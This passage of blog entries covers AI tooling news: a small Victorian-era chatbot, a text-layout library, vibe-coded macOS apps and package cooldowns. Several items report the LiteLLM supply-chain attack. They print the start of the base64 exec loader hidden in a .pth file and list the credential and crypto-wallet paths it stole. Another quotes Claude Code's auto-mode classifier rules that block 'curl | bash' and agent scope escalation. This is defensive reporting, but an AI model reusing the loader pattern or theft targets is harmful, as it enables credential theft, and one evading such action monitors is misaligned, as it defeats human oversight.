button. The interface uses a dark maroon and cream color scheme." style="max-width: 80%;" /></p> <p>Honestly, it's pretty terrible. Talking with it feels more like chatting with a Markov chain than an LLM - the responses may have a delightfully Victorian flavor to them but it's hard to get a response that usefully answers a question.</p> <p>The <a href="https://arxiv.org/abs/2203.15556">2022 Chinchilla paper</a> suggests a ratio of 20x the parameter count to training tokens. For a 340m model that would suggest around 7 billion tokens, more than twice the British Library corpus used here. The smallest Qwen 3.5 model is 600m parameters and that model family starts to get interesting at 2b - so my hunch is we would need 4x or more the training data to get something that starts to feel like a useful conversational partner.</p> <p>But what a fun project!</p> <h4 id="running-it-locally-with-llm">Running it locally with LLM</h4> <p>I decided to see if I could run the model on my own machine using my <a href="https://llm.datasette.io/">LLM</a> framework.</p> <p>I got Claude Code to do most of the work - <a href="https://gisthost.github.io/?7d0f00e152dd80d617b5e501e4ff025b/index.html">here's the transcript</a>.</p> <p>Trip trained the model using Andrej Karpathy's <a href="https://github.com/karpathy/nanochat">nanochat</a>, so I cloned that project, pulled the model weights and told Claude to build a Python script to run the model. Once we had that working (which ended up needing some extra details from the <a href="https://huggingface.co/spaces/tventurella/mr_chatterbox/tree/main">Space demo source code</a>) I had Claude <a href="https://llm.datasette.io/en/stable/plugins/tutorial-model-plugin.html">read the LLM plugin tutorial</a> and build the rest of the plugin.</p> <p><a href="https://github.com/simonw/llm-mrchatterbox">llm-mrchatterbox</a> is the result. Install the plugin like this:</p> <pre><code>llm install llm-mrchatterbox </code></pre> <p>The first time you run a prompt it will fetch the 2.05GB model file from Hugging Face. Try that like this:</p> <pre><code>llm -m mrchatterbox "Good day, sir" </code></pre> <p>Or start an ongoing chat session like this:</p> <pre><code>llm chat -m mrchatterbox </code></pre> <p>If you don't have LLM installed you can still get a chat session started from scratch using uvx like this:</p> <pre><code>uvx --with llm-mrchatterbox llm chat -m mrchatterbox </code></pre> <p>When you are finished with the model you can delete the cached file using:</p> <pre><code>llm mrchatterbox delete-model </code></pre> <p>This is the first time I've had Claude Code build a full LLM model plugin from scratch and it worked really well. I expect I'll be using this method again in the future.</p> <p>I continue to hope we can get a useful model from entirely public domain data. The fact that Trip was able to get this far using nanochat and 2.93 billion training tokens is a promising start.</p> <p id="update-31st"><strong>Update 31st March 2026</strong>: I had missed this when I first published this piece but Trip has his own <a href="https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/">detailed writeup of the project</a> which goes into much more detail about how he trained the model. Here's how the books were filtered for pre-training:</p> <blockquote> <p>First, I downloaded the British Library dataset split of all 19th-century books. I filtered those down to books contemporaneous with the reign of Queen Victoria—which, unfortunately, cut out the novels of Jane Austen—and further filtered those down to a set of books with a optical character recognition (OCR) confidence of .65 or above, as listed in the metadata. This left me with 28,035 books, or roughly 2.93 billion tokes for pretraining data.</p> </blockquote> <p>Getting it to behave like a conversational model was a lot harder. Trip started by trying to train on plays by Oscar Wilde and George Bernard Shaw, but found they didn't provide enough pairs. Then he tried extracting dialogue pairs from the books themselves with poor results. The approach that worked was to have Claude Haiku and GPT-4o-mini generate synthetic conversation pairs for the supervised fine tuning, which solved the problem but sadly I think dilutes the "no training inputs from after 1899" claim from the original model card.</p>
blogmark 9401 2026-03-29 20:08:45+00:00 Pretext - @_chenglou Exciting new browser library from Cheng Lou, previously a React core developer and the original creator of the [react-motion](https://github.com/chenglou/react-motion) animation library. Pretext solves the problem of calculating the height of a paragraph of line-wrapped text *without touching the DOM*. The usual way of doing this is to render the text and measure its dimensions, but this is extremely expensive. Pretext uses an array of clever tricks to make this much, much faster, which enables all sorts of new text rendering effects in browser applications. Here's [one demo](https://chenglou.me/pretext/dynamic-layout/) that shows the kind of things this makes possible: <video autoplay loop muted playsinline poster="https://static.simonwillison.net/static/2026/pretex.jpg"> <source src="https://static.simonwillison.net/static/2026/pretex.mp4" type="video/mp4"> </video> The key to how this works is the way it separates calculations into a call to a `prepare()` function followed by multiple calls to `layout()`. The `prepare()` function splits the input text into segments (effectively words, but it can take things like soft hyphens and non-latin character sequences and emoji into account as well) and measures those using an off-screen canvas, then caches the results. This is comparatively expensive but only runs once. The `layout()` function can then emulate the word-wrapping logic in browsers to figure out how many wrapped lines the text will occupy at a specified width and measure the overall height. I [had Claude](https://claude.ai/share/7859cbe1-1350-4341-bb40-6aa241d6a1fe) build me [this interactive artifact](https://tools.simonwillison.net/pretext-explainer) to help me visually understand what's going on, based on a simplified version of Pretext itself. The way this is tested is particularly impressive. The earlier tests [rendered a full copy of the Great Gatsby](https://github.com/chenglou/pretext/commit/d07dd7a5008726f99a15cebe0abd9031022e28ef#diff-835c37ed3b9234ed4d90c7703addb8e47f4fee6d9a28481314afd15ac472f8d2) in multiple browsers to confirm that the estimated measurements were correct against a large volume of text. This was later joined by [the corpora/ folder](https://github.com/chenglou/pretext/tree/main/corpora) using the same technique against lengthy public domain documents in Thai, Chinese, Korean, Japanese, Arabic, and more. Cheng Lou [says](https://twitter.com/_chenglou/status/2037715226838343871): > The engine’s tiny (few kbs), aware of browser quirks, supports all the languages you’ll need, including Korean mixed with RTL Arabic and platform-specific emojis > > This was achieved through showing Claude Code and Codex the browsers ground truth, and have them measure & iterate against those at every significant container width, running over weeks
quotation 2128 2026-03-28 12:04:26+00:00 The thing about agentic coding is that agents grind problems into dust. Give an agent a problem and a while loop and - long term - it’ll solve that problem even if it means burning a trillion tokens and re-writing down to the silicon. [...] But we want AI agents to solve coding problems quickly and in a way that is maintainable and adaptive and composable (benefiting from improvements elsewhere), and where every addition makes the whole stack better. So at the bottom is really great libraries that encapsulate hard problems, with great interfaces that make the “right” way the easy way for developers building apps with them. Architecture! While I’m vibing (I call it vibing now, not coding and not vibe coding) while I’m vibing, I am looking at lines of code less than ever before, and thinking about architecture more than ever before. - Matt Webb
quotation 2127 2026-03-27 21:11:17+00:00 FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...] - Richard Fontana
entry 9238 2026-03-27 20:59:53+00:00 Vibe coding SwiftUI apps is a lot of fun <p>I have a new laptop - a 128GB M5 MacBook Pro, which early impressions show to be <em>very</em> capable for running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance and I'm very happy with the results.</p> <p>This is my second experiment with vibe coding macOS apps - the first was <a href="https://simonwillison.net/2026/Feb/25/present/">this presentation app a few weeks ago</a>.</p> <p>It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.</p> <p>I’ve built two apps so far: Bandwidther shows me what apps are using network bandwidth and Gpuer to show me what’s going on with the GPU. At Claude’s suggestion both of these are now menu bar icons that open a panel full of information.</p> <h4 id="bandwidther">Bandwidther</h4> <p>I built this app first, because I wanted to see what Dropbox was doing. It looks like this:</p> <p><a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/bandwidther/raw/main/screenshot.png"><img src="https://github.com/simonw/bandwidther/raw/main/screenshot.png" alt="Screenshot of Bandwidther macOS app showing two columns: left side displays overall download/upload speeds, a bandwidth graph over the last 60 seconds, cumulative totals, internet and LAN connection counts, and internet destinations; right side shows per-process bandwidth usage sorted by rate with processes like nsurlsessiond, apsd, rapportd, mDNSResponder, Dropbox, and others listed with their individual download/upload speeds and progress bars." style="max-width: 100%;" /></a></p> <p>I’ve shared <a href="https://gisthost.github.io/?6e06d4724c64c10d1fc3fbe19d9c8575/index.html">the full transcript</a> I used to build the first version of the app. My prompts were pretty minimal:</p> <blockquote> <p>Show me how much network bandwidth is in use from this machine to the internet as opposed to local LAN</p> </blockquote> <p>(My initial curiosity was to see if Dropbox was transferring files via the LAN from my old computer or was downloading from the internet.)</p> <blockquote> <p>mkdir /tmp/bandwidther and write a native Swift UI app in there that shows me these details on a live ongoing basis</p> </blockquote> <p>This got me the first version, which proved to me this was worth pursuing further.</p> <blockquote> <p>git init and git commit what you have so far</p> </blockquote> <p>Since I was about to start adding new features.</p> <blockquote> <p>Now suggest features we could add to that app, the goal is to provide as much detail as possible concerning network usage including by different apps</p> </blockquote> <p>The nice thing about having Claude suggest features is that it has a much better idea for what’s possible than I do.</p> <p>We had a bit of back and forth fixing some bugs, then I sent a few more prompts to get to the two column layout shown above:</p> <blockquote> <p>add Per-Process Bandwidth, relaunch the app once that is done</p> </blockquote> <blockquote> <p>now add the reverse DNS feature but make sure original IP addresses are still visible too, albeit in smaller typeface</p> </blockquote> <blockquote> <p>redesign the app so that it is wider, I want two columns - the per-process one on the left and the rest on the right</p> </blockquote> <blockquote> <p>OK make it a task bar icon thing, when I click the icon I want the app to appear, the icon itself should be a neat minimal little thing</p> </blockquote> <p>The source code and build instructions are available in <a href="https://github.com/simonw/bandwidther">simonw/bandwidther</a>.</p> <h4 id="gpuer">Gpuer</h4> <p>While I was building Bandwidther in one session I had another session running to build a similar tool for seeing what the GPU was doing. Here’s what I ended up with:</p> <p><a target="_blank" rel="noopener noreferrer" href="https://github.com/simonw/gpuer/raw/main/screenshot.png"><img src="https://github.com/simonw/gpuer/raw/main/screenshot.png" alt="Screenshot of the Gpuer app on macOS showing memory usage for an Apple M5 Max with 40 GPU cores. Left panel: a large orange &quot;38 GB Available&quot; readout showing usage of 128.0 GB unified memory, &quot;Room for ~18 more large apps before pressure&quot;, a warning banner reading &quot;1.5 GB pushed to disk — system was under pressure recently&quot;, a horizontal segmented bar chart labeled &quot;Where your memory is going&quot; with green, blue, and grey segments and a legend, an explanatory note about GPU unified memory, a GPU Utilization section showing 0%, and a History graph showing Available and GPU Utilization over time as line charts. Right panel: a Memory Footprint list sorted by Memory, showing process names with horizontal pink/purple usage bars and CPU percentage labels beside each entry, covering processes including Dropbox, WebKit, Virtualization, node, Claude Helper, Safari, LM Studio, WindowServer, Finder, and others." style="max-width: 100%;" /></a></p> <p>Here's <a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529">the transcript</a>. This one took even less prompting because I could use the in-progress Bandwidther as an example:</p> <blockquote> <p>I want to know how much RAM and GPU this computer is using, which is hard because stuff on the GPU and RAM does not seem to show up in Activity Monitor</p> </blockquote> <p>This collected information using <code>system_profiler</code> and <code>memory_pressure</code> and gave me <a href="https://gisthost.github.io/?71ffe216ceca8d7da59a07c478d17529/page-001.html#msg-2026-03-24T22-13-26-614Z">an answer</a> - more importantly it showed me this was possible, so I said:</p> <blockquote> <p>Look at /tmp/bandwidther and then create a similar app in /tmp/gpuer which shows the information from above on an ongoing basis, or maybe does it better</p> </blockquote> <p>After a few more changes to the Bandwidther app I told it to catch up:</p> <blockquote> <p>Now take a look at recent changes in /tmp/bandwidther - that app now uses a sys tray icon, imitate that</p> </blockquote> <p>This remains one of my favorite tricks for using coding agents: having them <a href="https://simonwillison.net/guides/agentic-engineering-patterns/hoard-things-you-know-how-to-do/#recombining-things-from-your-hoard">recombine elements</a> from other projects.</p> <p>The code for Gpuer can be found in <a href="https://github.com/simonw/gpuer">simonw/gpuer</a> on GitHub.</p> <h4 id="you-shouldn-t-trust-these-apps">You shouldn't trust these apps</h4> <p>These two apps are classic vibe coding: I don't know Swift and I hardly glanced at the code they were writing.</p> <p>More importantly though, I have very little experience with macOS internals such as the values these tools are measuring. I am completely unqualified to evaluate if the numbers and charts being spat out by these tools are credible or accurate!</p> <p>I've added warnings to both GitHub repositories to that effect.</p> <p>This morning I caught Gpuer reporting that I had just 5GB of memory left when that clearly wasn't the case (according to Activity Monitor). I <a href="https://gisthost.github.io/?9ae12fff0fecc9a4482c9b02e8599c70/page-001.html#msg-2026-03-27T19-35-35-866Z">pasted a screenshot into Claude Code</a> and it <a href="https://github.com/simonw/gpuer/commit/a3cd655f5ccb274d3561e4cbfcc771b0bb7e256a">adjusted the calculations</a> and the new numbers <em>look</em> right, but I'm still not confident that it's reporting things correctly.</p> <p>I only shared them on GitHub because I think they're interesting as an example of what Claude can do with SwiftUI.</p> <p>Despite my lack of confidence in the apps themselves, I did learn some useful things from these projects:</p> <ul> <li>A SwiftUI app can get a whole lot done with a single file of code - here's <a href="https://github.com/simonw/gpuer/blob/main/GpuerApp.swift">GpuerApp.swift</a> (880 lines) and <a href="https://github.com/simonw/bandwidther/blob/main/BandwidtherApp.swift">BandwidtherApp.swift</a> (1063 lines).</li> <li>Wrapping various terminal commands in a neat UI with Swift is easily achieved.</li> <li>Claude has surprisingly good design taste when it comes to SwiftUI applications.</li> <li>Turning an app into a menu bar app is just a few lines of extra code as well.</li> <li>You don't need to open Xcode to build this kind of application!</li> </ul> <p>These two apps took very little time to build and have convinced me that building macOS apps in SwiftUI is a new capability I should consider for future projects.</p>
blogmark 9400 2026-03-27 00:35:01+00:00 We Rewrote JSONata with AI in a Day, Saved $500K/Year - Bit of a hyperbolic framing but this looks like another case study of **vibe porting**, this time spinning up a new custom Go implementation of the [JSONata](https://jsonata.org) JSON expression language - similar in focus to jq, and heavily associated with the [Node-RED](https://nodered.org) platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.
blogmark 9399 2026-03-26 23:58:22+00:00 My minute-by-minute response to the LiteLLM malware attack - Hacker News Callum McMahon reported the [LiteLLM malware attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container: > **Confirmed**. Fresh download from PyPI right now in an isolated Docker container: > > Inspecting: litellm-1.82.8-py3-none-any.whl > FOUND: litellm_init.pth > SIZE: 34628 bytes > FIRST 200 CHARS: > import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl... > > The malicious `litellm==1.82.8` is **live on PyPI right now** and anyone installing or upgrading litellm will be infected. This needs to be reported to security@pypi.org immediately. I was chuffed to see Callum use my [claude-code-transcripts](https://github.com/simonw/claude-code-transcripts) tool to publish the transcript of the conversation.
blogmark 9397 2026-03-26 16:21:09+00:00 Quantization from the ground up - Sam Rose continues [his streak](https://simonwillison.net/tags/sam-rose/) of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "[the best post I've ever made](https://twitter.com/samwhoo/status/2036845101561835968)".) Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits. ![Screenshot of an interactive float32 binary representation tool showing the value -48.92364502, with color-coded bit fields labeled S (sign), EXPONENT (blue), and SIGNIFICAND (pink), displaying the 32-bit pattern 11000010010000111101100001110100000, and a slider control at the bottom along with minus, plus, and reset buttons.](https://static.simonwillison.net/static/2026/float.jpg) I hadn't heard about **outlier values** in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important: > Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are *very* important to model quality. Removing even a *single* "super weight," as Apple calls them, can cause the model to output complete gibberish. > > Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed. Plus there's a section on [How much does quantization affect model accuracy?](https://ngrok.com/blog/quantization#how-much-does-quantization-affect-model-accuracy). Sam explains the concepts of **perplexity** and ** KL divergence ** and then uses the [llama.cpp perplexity tool](https://github.com/ggml-org/llama.cpp/tree/master/tools/perplexity) and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B. His conclusion: > It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.
blogmark 9396 2026-03-25 21:47:17+00:00 Thoughts on slowing the fuck down - Mario Zechner created the [Pi agent framework](https://github.com/badlogic/pi-mono) used by OpenClaw, giving considerable credibility to his opinions on current trends in agentic engineering. He's not impressed: > We have basically given up all discipline and agency for a sort of addiction, where your highest goal is to produce the largest amount of code in the shortest amount of time. Consequences be damned. Agents and humans both make mistakes, but agent mistakes accumulate much faster: > A human is a bottleneck. A human cannot shit out 20,000 lines of code in a few hours. Even if the human creates such booboos at high frequency, there's only so many booboos the human can introduce in a codebase per day. [...] > > With an orchestrated army of agents, there is no bottleneck, no human pain. These tiny little harmless booboos suddenly compound at a rate that's unsustainable. You have removed yourself from the loop, so you don't even know that all the innocent booboos have formed a monster of a codebase. You only feel the pain when it's too late. [...] > > You have zero fucking idea what's going on because you delegated all your agency to your agents. You let them run free, and they are merchants of complexity. I think Mario is exactly right about this. Agents let us move *so much faster*, but this speed also means that changes which we would normally have considered over the course of weeks are landing in a matter of hours. It's so easy to let the codebase evolve outside of our abilities to reason clearly about it. [Cognitive debt](https://simonwillison.net/tags/cognitive-debt/) is real. Mario recommends slowing down: > Give yourself time to think about what you're actually building and why. Give yourself an opportunity to say, fuck no, we don't need this. Set yourself limits on how much code you let the clanker generate per day, in line with your ability to actually review the code. > > Anything that defines the gestalt of your system, that is architecture, API, and so on, write it by hand. [...] I'm not convinced writing by hand is the best way to address this, but it's absolutely the case that we need the discipline to find a new balance of speed v.s. mental thoroughness now that typing out the code is no longer anywhere close to being the bottleneck on writing software.
blogmark 9395 2026-03-25 17:21:04+00:00 LiteLLM Hack: Were You One of the 47,000? - @hnykda Daniel Hnyk used the [BigQuery PyPI dataset](https://console.cloud.google.com/bigquery?p=bigquery-public-data&d=pypi) to determine how many downloads there were of [the exploited LiteLLM packages](https://simonwillison.net/2026/Mar/24/malicious-litellm/) during the 46 minute period they were live on PyPI. The answer was 46,996 across the two compromised release versions (1.82.7 and 1.82.8). They also identified 2,337 packages that depended on LiteLLM - 88% of which did not pin versions in a way that would have avoided the exploited version.
blogmark 9394 2026-03-24 23:57:33+00:00 Auto mode for Claude Code - Really interesting new development in Claude Code today as an alternative to `--dangerously-skip-permissions`: > Today, we're introducing auto mode, a new permissions mode in Claude Code where Claude makes permission decisions on your behalf, with safeguards monitoring actions before they run. Those safeguards appear to be implemented using Claude Sonnet 4.6, as [described in the documentation](https://code.claude.com/docs/en/permission-modes#eliminate-prompts-with-auto-mode): > Before each action runs, a separate classifier model reviews the conversation and decides whether the action matches what you asked for: it blocks actions that escalate beyond the task scope, target infrastructure the classifier doesn’t recognize as trusted, or appear to be driven by hostile content encountered in a file or web page. [...] > > **Model**: the classifier runs on Claude Sonnet 4.6, even if your main session uses a different model. They ship with an extensive set of default filters, and you can also customize them further with your own rules. The most interesting insight into how they work comes when you run this new command in the terminal: claude auto-mode defaults [Here's the full JSON output](https://gist.githubusercontent.com/simonw/91863bfd9f7ebf916d1fabb8e6940335/raw/cda3c88e919b8238e85d3f1cc990e8ff48ad9a18/defaults.json). It's pretty long, so here's an illustrative subset: From the "allow" list: > - Test Artifacts: Hardcoded test API keys, placeholder credentials in examples, or hardcoding test cases > - Local Operations: Agent deleting local files in working directory, local file operations within project scope, or using `--ignore-certificate-errors` for local testing. "Project scope" means the repository the session started in — wandering into ~/, ~/Library/, /etc, or other repos is scope escalation (User Intent Rule #2), not a local operation. Does NOT cover irreversible destruction of pre-existing files or local stateful services — see "Irreversible Local Destruction" in BLOCK. > - Read-Only Operations: GET requests, read-only API calls, or queries that don't modify state and don't contain sensitive information in the URL. Note: PREEMPTIVE BLOCK ON CLEAR INTENT still applies — if the transcript contains clear evidence the agent is using read-only operations to scout for a blocked action, block it. > - Declared Dependencies: Installing packages that are already declared in the repo's manifest files (requirements.txt, package.json, Cargo.toml, pyproject.toml, Gemfile, etc.) via standard commands that read those manifests (`pip install -r requirements.txt`, `npm install`, `cargo build`, `bundle install`) — provided the agent has not modified the manifest in this session. Does NOT cover installing agent-chosen package names (e.g. `pip install foo`, `npm install bar`) — those carry typosquat and supply-chain risk. [...] From "soft_deny": > - Git Destructive: Force pushing (`git push --force`), deleting remote branches, or rewriting remote history > - Git Push to Default Branch: Pushing directly to main, master, or the repository's default branch — this bypasses pull request review. Commits should be pushed to a new feature branch instead. > -Code from External: Downloading and executing code from external sources — e.g. `curl | bash`, deserializing external data via formats that can execute code (eval, exec, yaml.unsafe_load, pickle, etc), or similar mechanisms. Also includes running code from an external repo cloned earlier in the transcript (pip install -e, make install, python script.py, pickle.load/torch.load on cloned repo files) — "local on disk" does not mean trusted if it was cloned from an external source visible in the transcript. The repo the agent starts in is trusted. > - Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...] I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through: > The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk. The fact that the default allow list includes `pip install -r requirements.txt` also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning [with LiteLLM](https://simonwillison.net/2026/Mar/24/malicious-litellm/). I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode.
blogmark 9393 2026-03-24 21:11:38+00:00 Package Managers Need to Cool Down - Today's [LiteLLM supply chain attack](https://simonwillison.net/2026/Mar/24/malicious-litellm/) inspired me to revisit the idea of [dependency cooldowns](https://simonwillison.net/2025/Nov/21/dependency-cooldowns/), the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way. This recent piece (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across major packaging tools, including: - [pnpm 10.16](https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates) (September 2025) — `minimumReleaseAge` with `minimumReleaseAgeExclude` for trusted packages - [Yarn 4.10.0](https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0) (September 2025) — `npmMinimalAgeGate` (in minutes) with `npmPreapprovedPackages` for exemptions - [Bun 1.3](https://bun.com/blog/bun-v1.3#minimum-release-age) (October 2025) — `minimumReleaseAge` via `bunfig.toml` - [Deno 2.6](https://deno.com/blog/v2.6#controlling-dependency-stability) (December 2025) — `--minimum-dependency-age` for `deno update` and `deno outdated` - [uv 0.9.17](https://github.com/astral-sh/uv/releases/tag/0.9.17) (December 2025) — added relative duration support to existing `--exclude-newer`, plus per-package overrides via `exclude-newer-package` - [pip 26.0](https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/) (January 2026) — `--uploaded-prior-to` (absolute timestamps only; [relative duration support requested](https://github.com/pypa/pip/issues/13674)) - [npm 11.10.0](https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration) (February 2026) — `min-release-age` `pip` currently only supports absolute rather than relative dates but Seth Larson [has a workaround for that](https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab) using a scheduled cron to update the absolute date in the `pip.conf` config file.
quotation 2126 2026-03-24 20:35:52+00:00 I really think "give AI total control of my computer and therefore my entire life" is going to look so foolish in retrospect that everyone who went for this is going to look as dumb as Jimmy Fallon holding up a picture of his Bored Ape - Christopher Mims
blogmark 9392 2026-03-24 15:07:31+00:00 Malicious litellm_init.pth in litellm 1.82.8 — credential stealer - The LiteLLM v1.82.8 package published to PyPI was compromised with a particularly nasty credential stealer hidden in base64 in a `litellm_init.pth` file, which means installing the package is enough to trigger it even without running `import litellm`. (1.82.7 had the exploit as well but it was in the `proxy/proxy_server.py` file so the package had to be imported for it to take effect.) This issue has a very detailed description of what the credential stealer does. There's more information about the timeline of the exploit [over here](https://github.com/BerriAI/litellm/issues/24518). PyPI has already [quarantined](https://pypi.org/help/#project_in_quarantine) the [litellm package](https://pypi.org/project/litellm/) so the window for compromise was just a few hours, but if you DID install the package it would have hoovered up a bewildering array of secrets, including `~/.ssh/`, `~/.gitconfig`, `~/.git-credentials`, `~/.aws/`, `~/.kube/`, `~/.config/`, `~/.azure/`, `~/.docker/`, `~/.npmrc`, `~/.vault-token`, `~/.netrc`, `~/.lftprc`, `~/.msmtprc`, `~/.my.cnf`, `~/.pgpass`, `~/.mongorc.js`, `~/.bash_history`, `~/.zsh_history`, `~/.sh_history`, `~/.mysql_history`, `~/.psql_history`, `~/.rediscli_history`, `~/.bitcoin/`, `~/.litecoin/`, `~/.dogecoin/`, `~/.zcash/`, `~/.dashcore/`, `~/.ripple/`, `~/.bitmonero/`, `~/.ethereum/`, `~/.cardano/`. It looks like this supply chain attack started with the [recent exploit](https://www.crowdstrike.com/en-us/blog/from-scanner-to-stealer-inside-the-trivy-action-supply-chain-compromise/) against [Trivy](https://trivy.dev/), ironically a security scanner tool that was used in CI [by LiteLLM](https://github.com/BerriAI/litellm/blob/9343aeefca37aa49a6ea54397d7615adae5c72c9/ci_cd/security_scans.sh#L16). The Trivy exploit likely resulted in stolen PyPI credentials which were then used to directly publish the vulnerable packages.
quotation 2094 2026-03-23 23:31:45+00:00 slop is something that takes more human effort to consume than it took to produce. When my coworker sends me raw Gemini output he’s not expressing his freedom to create, he’s disrespecting the value of my time - Neurotica
quotation 2093 2026-03-23 18:56:18+00:00 I have been doing this for years, and the hardest parts of the job were never about typing out code. I have always struggled most with understanding systems, debugging things that made no sense, designing architectures that wouldn't collapse under heavy load, and making decisions that would save months of pain later. None of these problems can be solved LLMs. They can suggest code, help with boilerplate, sometimes can act as a sounding board. But they don't understand the system, they don't carry context in their "minds", and they certianly don't know why a decision is right or wrong. And the most importantly, they don't choose. That part is still yours. The real work of software development, the part that makes someone valuable, is knowing what should exist in the first place, and why. - David Abram
entry 9205 2026-03-23 18:47:46+00:00 Claude's new inline visualizations are nice, and can render data from external APIs <style> .legend{display:flex;flex-wrap:wrap;gap:16px;margin:0 0 8px;font-size:12px;color:var(--color-text-secondary)} .legend span{display:flex;align-items:center;gap:4px} .legend i{width:10px;height:10px;border-radius:2px;display:inline-block} </style> <div class="legend"> <span><i style="background:#534AB7"> </i>Blog entries</span> <span><i style="background:#D85A30"> </i>Blogmarks</span> <span><i style="background:#185FA5"> </i>Quotations</span> <span><i style="background:#0F6E56"> </i>TILs</span> <span><i style="background:#D4537E"> </i>Notes</span> </div> <div style="position:relative;width:100%;height:360px"><canvas id="stackChart"> </canvas></div> <script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/4.4.1/chart.umd.js"> </script> <script> const isDark = matchMedia('(prefers-color-scheme: dark)').matches; const gridColor = isDark ? 'rgba(255,255,255,0.08)' : 'rgba(0,0,0,0.06)'; const textColor = isDark ? '#b4b2a9' : '#5f5e5a'; const years = ['2002','2003','2004','2005','2006','2007','2008','2009','2010','2011','2012','2013','2014','2015','2016','2017','2018','2019','2020','2021','2022','2023','2024','2025','2026']; const entries = {2002:675,2003:648,2004:141,2005:57,2006:37,2007:35,2008:10,2009:14,2010:142,2011:132,2012:294,2013:400,2014:31,2015:4,2016:21,2017:33,2018:20,2019:26,2020:68,2021:79,2022:82,2023:94,2024:90,2025:119,2026:27}; const blogmarks = {2003:214,2004:1020,2005:665,2006:607,2007:1063,2008:779,2009:634,2010:329,2011:33,2014:2,2017:181,2018:225,2019:158,2020:165,2021:158,2022:214,2023:380,2024:795,2025:589,2026:95}; const quotations = {2006:6,2007:147,2008:104,2009:101,2010:51,2011:7,2017:35,2018:65,2019:31,2020:54,2021:39,2022:33,2023:139,2024:258,2025:237,2026:47}; const tils = {2020:100,2021:125,2022:141,2023:116,2024:62,2025:27,2026:4}; const notes = {2024:1,2025:99,2026:20}; function g(obj, y) { return obj[y] || 0 }; new Chart(document.getElementById('stackChart'), { type: 'bar', data: { labels: years.map(y => "'" + y.slice(2)), datasets: [ { label: 'Blog entries', data: years.map(y => g(entries,y)), backgroundColor: isDark ? '#AFA9EC' : '#534AB7', borderRadius: 2 }, { label: 'Blogmarks', data: years.map(y => g(blogmarks,y)), backgroundColor: isDark ? '#F0997B' : '#D85A30', borderRadius: 2 }, { label: 'Quotations', data: years.map(y => g(quotations,y)), backgroundColor: isDark ? '#85B7EB' : '#185FA5', borderRadius: 2 }, { label: 'TILs', data: years.map(y => g(tils,y)), backgroundColor: isDark ? '#5DCAA5' : '#0F6E56', borderRadius: 2 }, { label: 'Notes', data: years.map(y => g(notes,y)), backgroundColor: isDark ? '#ED93B1' : '#D4537E', borderRadius: 2 }, ] }, options: { responsive: true, maintainAspectRatio: false, plugins: { legend: { display: false }, tooltip: { callbacks: { afterBody: function(items) { const total = items.reduce((s, i) => s + (i.raw || 0), 0); return 'Total: ' + total; } } }}, scales: { x: { stacked: true, grid: { display: false }, ticks: { color: textColor, font: { size: 11 }, maxRotation: 0 } }, y: { stacked: true, grid: { color: gridColor }, ticks: { color: textColor, font: { size: 11 } } } } } }); </script>
entry 9173 2026-03-22 23:57:44+00:00 Experimenting with Starlette 1.0 with Claude skills <p><a href="https://marcelotryle.com/blog/2026/03/22/starlette-10-is-here/">Starlette 1.0 is out</a>! This is a really big deal. I think Starlette may be the Python framework with the most usage compared to its relatively low brand recognition because Starlette is the foundation of <a href="https://fastapi.tiangolo.com/">FastAPI</a>, which has attracted a huge amount of buzz that seems to have overshadowed Starlette itself.</p> <p>Kim Christie started working on Starlette in 2018 and it quickly became my favorite out of the new breed of Python ASGI frameworks. The only reason I didn't use it as the basis for my own <a href="https://datasette.io/">Datasette</a> project was that it didn't yet promise stability, and I was determined to provide a stable API for Datasette's own plugins... albeit I still haven't been brave enough to ship my own 1.0 release (after 26 alphas and counting)!</p> <p>Then in September 2025 Marcelo Trylesinski <a href="https://github.com/Kludex/starlette/discussions/2997">announced that Starlette and Uvicorn were transferring to their GitHub account</a>, in recognition of their many years of contributions and to make it easier for them to receive 